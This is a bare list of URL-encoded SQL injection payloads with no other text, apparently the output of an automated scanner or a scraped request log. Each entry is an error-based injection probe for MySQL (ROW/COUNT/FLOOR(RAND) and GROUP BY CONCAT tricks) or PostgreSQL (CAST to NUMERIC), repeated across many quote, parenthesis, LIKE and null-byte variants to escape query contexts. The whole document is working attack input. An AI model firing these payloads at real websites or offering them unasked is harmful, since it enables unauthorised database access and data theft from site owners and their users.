-2360%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%285488%3D5488 -3848%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%284643%3D4643 -8147%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29 -8579%27%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%27bNVk%27%3D%27bNVk -9098%27%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27RwIa%27%3D%27RwIa -8799%27%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27aQFg%27%3D%27aQFg -5202%27%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%27EqaZ%27%3D%27EqaZ -5625%27%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%27duNt%27%20LIKE%20%27duNt -1457%27%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27IRap%27%20LIKE%20%27IRap -5463%27%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27pOji%27%20LIKE%20%27pOji -5172%27%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%27eXdM%27%20LIKE%20%27eXdM -3152%22%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%22SnnS%22%3D%22SnnS -5398%22%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22TPug%22%3D%22TPug -8877%22%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22zCdC%22%3D%22zCdC -8039%22%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%22hDmz%22%3D%22hDmz -1683%22%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%22eUnm%22%20LIKE%20%22eUnm -2235%22%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22KOCZ%22%20LIKE%20%22KOCZ -5581%22%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22jvaD%22%20LIKE%20%22jvaD -1056%22%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%22sihW%22%20LIKE%20%22sihW -4719%25%27%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 -3624%25%27%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 -5233%25%27%29%29%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 -1543%25%27%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 -8467%00%27%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%28%27joPC%27%3D%27joPC -5170%00%27%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%27Tuzn%27%3D%27Tuzn -4446%27%29%20WHERE%209540%3D9540%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -9858%22%29%20WHERE%208941%3D8941%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -1652%29%20WHERE%206866%3D6866%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -2640%27%20WHERE%208300%3D8300%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -3999%22%20WHERE%203863%3D3863%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -3895%20WHERE%209753%3D9753%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20--%20 -9761%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1136%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6901%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1777%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7979%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5540%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5063%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9278%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6595%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5395%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1543%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7398%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5923%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5946%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5679%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6749%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1952%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6839%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7068%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1838%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6440%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2843%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6695%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3178%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3960%25%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9986%25%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7791%25%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5717%25%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4002%00%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9322%00%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3074%27%29%20WHERE%208014%3D8014%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8100%22%29%20WHERE%205766%3D5766%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9468%29%20WHERE%205010%3D5010%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8578%27%20WHERE%203537%3D3537%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2880%22%20WHERE%207752%3D7752%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6958%20WHERE%208390%3D8390%20OR%201%20GROUP%20BY%20CONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%286610%3D6610%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4726%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -9645%27%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -3783%27%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -6786%22%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -9879%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%284719%3D4719 